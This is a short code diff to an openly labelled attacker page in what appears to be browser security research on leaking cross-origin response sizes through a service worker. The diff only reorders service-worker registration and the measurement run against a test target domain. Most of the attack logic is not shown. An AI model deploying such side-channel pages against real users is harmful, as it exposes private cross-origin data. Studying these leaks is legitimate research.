--- a/src/range-serviceworker/attacker.html
+++ b/src/range-serviceworker/attacker.html
@@ -4,14 +4,6 @@
     <title>Response size leak</title>
     <script>
 
-      if ('serviceWorker' in navigator) {
-				addEventListener("load", async () => {
-					await navigator.serviceWorker.register('serviceworker.js');
-				});
-			} else {
-        document.body.innerHTML += ('Browser does not support Service Workers');
-      }
-
 
       function show(element, url, size, event, diff) {
         document.getElementById('tbody').innerHTML += `<tr><td>${element}</td><td>${url}</td><td>${size}</td><td>${event}</td><td>${diff}</td><tr>`;
@@ -33,7 +25,7 @@
         }
       }
 
-      function run() {
+      async function run() {
         base = 'https://target.georgetian.com/';
         resources = [
           //'text.txt',
@@ -73,9 +65,14 @@
           }
         }
       }
-      
-      onload = () => {
-        run();
+
+      if ('serviceWorker' in navigator) {
+				addEventListener('load', async () => {
+					await navigator.serviceWorker.register('serviceworker.js');
+          await run();
+				});
+			} else {
+        document.body.innerHTML += ('Browser does not support Service Workers');
       }
 
     </script>
